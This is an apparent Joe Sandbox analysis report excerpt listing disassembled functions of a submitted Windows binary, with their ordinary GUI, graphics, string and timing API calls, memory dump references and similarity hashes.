                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$LongWindow$InvalidateRect
                                                                          • String ID:
                                                                          • API String ID: 1976402638-0
                                                                          • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                          • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                          • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                          • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                          Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                          • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                          • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                          • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                          • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Show$Enable$MessageSend
                                                                          • String ID:
                                                                          • API String ID: 642888154-0
                                                                          • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                          • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                          • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                          • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                          Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$Copy$ClearErrorLast
                                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                                          • API String ID: 2487901850-572801152
                                                                          • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                          • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                          • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                          • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                          Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Enable$Show$MessageSend
                                                                          • String ID:
                                                                          • API String ID: 1871949834-0
                                                                          • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                          • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                          • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                          • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                          Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                          • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                          • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                          • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                          Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                          • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                          • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                          • SendMessageW.USER32 ref: 00471AE3
                                                                          • DestroyIcon.USER32(?), ref: 00471AF4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                          • String ID:
                                                                          • API String ID: 3611059338-0
                                                                          • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                          • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                          • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                          • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                          Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: DestroyWindow$DeleteObject$IconMove
                                                                          • String ID:
                                                                          • API String ID: 1640429340-0
                                                                          • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                          • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                          • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                          • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                          Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                            • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                          • _wcslen.LIBCMT ref: 004438CD
                                                                          • _wcslen.LIBCMT ref: 004438E6
                                                                          • _wcstok.LIBCMT ref: 004438F8
                                                                          • _wcslen.LIBCMT ref: 0044390C
                                                                          • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                                                          • _wcstok.LIBCMT ref: 00443931
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                                                          • String ID:
                                                                          • API String ID: 3632110297-0
                                                                          • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                          • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                                                          • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                                                          • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                                                          Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                          • String ID:
                                                                          • API String ID: 752480666-0
                                                                          • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                          • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                          • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                          • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                          Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                          • String ID:
                                                                          • API String ID: 3275902921-0
                                                                          • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                          • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                          • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                          • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                          Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                          • String ID:
                                                                          • API String ID: 3275902921-0
                                                                          • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                          • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                          • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                          • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                          Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                          • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                          • String ID:
                                                                          • API String ID: 2833360925-0
                                                                          • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                          • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                          • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                          • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                          Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32 ref: 004555C7
                                                                          • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                          • DeleteObject.GDI32(?), ref: 00455736
                                                                          • DeleteObject.GDI32(?), ref: 00455744
                                                                          • DestroyIcon.USER32(?), ref: 00455752
                                                                          • DestroyWindow.USER32(?), ref: 00455760
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                          • String ID:
                                                                          • API String ID: 3691411573-0
                                                                          • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                          • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                                          • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                          • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                                          Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                          • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                          • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                          • EndPath.GDI32(?), ref: 004472D6
                                                                          • StrokePath.GDI32(?), ref: 004472E4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                          • String ID:
                                                                          • API String ID: 372113273-0
                                                                          • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                          • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                          • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                          • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                          Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDC.USER32(00000000), ref: 0044CC6D
                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
